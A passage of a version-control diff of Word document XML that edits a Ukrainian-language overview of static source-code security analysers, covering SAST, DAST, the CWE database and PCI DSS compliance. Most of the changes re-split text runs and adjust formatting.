-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Аналізатори вихідного коду - клас програмних продуктів, створених для виявлення і запобігання експлуатації програмних помилок у вихідних кодах. Всі продукти, спрямовані на аналіз вихідного коду, можна умовно розділити на три типи: </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:firstLine="348"/>
+        <w:t>Класифікація</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>аналізаторів</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>вихідного</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>коду</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Аналізатори</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>вихідного</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>коду</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>клас</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>програмних</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>продуктів</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>створених</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>для</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>виявлення</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>запобігання</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>експлуатації</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>програмних</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">помилок у вихідних кодах. Всі продукти, спрямовані на аналіз вихідного коду, можна умовно розділити на три типи: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2A2A2A"/>
@@ -4146,7 +5056,7 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:firstLine="348"/>
+        <w:ind w:left="0" w:firstLine="348"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2A2A2A"/>
@@ -4202,7 +5112,7 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:firstLine="348"/>
+        <w:ind w:left="0" w:firstLine="348"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2A2A2A"/>
@@ -4317,7 +5227,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є </w:t>
+        <w:t xml:space="preserve">ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4328,7 +5238,17 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">самостійним методом перевірки, який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли доступ до вихідних текстів </w:t>
+        <w:t>який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">туп до вихідних текстів </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -4350,7 +5270,28 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідсутня. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
+        <w:t>ідсутн</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ій</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -4492,18 +5433,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ішення по </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">прийманню та впровадження розробленого коду або відправки його на доопрацювання. </w:t>
+        <w:t xml:space="preserve">ішення по прийманню та впровадження розробленого коду або відправки його на доопрацювання. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4524,6 +5454,7 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5940425" cy="2083489"/>
@@ -4542,7 +5473,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11">
+                    <a:blip r:embed="rId12">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4583,6 +5514,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -4736,7 +5668,40 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від </w:t>
+        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> області розробки і захисту програмного забезпечення. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Дані документи безпосередньо не описують помилки програмування, на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4747,7 +5712,18 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">світових експертів </w:t>
+        <w:t>відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Від того, які бази використовуються в аналізаторі, безпосередньо залежить якість проведення аналізу, кількість помилкових спрацьовувань і пропущених помилок. </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -4758,6 +5734,28 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>Кр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t>в</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
@@ -4769,72 +5767,6 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> області розробки і захисту програмного забезпечення. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Дані документи безпосередньо не описують помилки програмування, на відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Від того, які бази використовуються в аналізаторі, безпосередньо залежить якість проведення аналізу, кількість помилкових спрацьовувань і пропущених помилок. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Кр</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
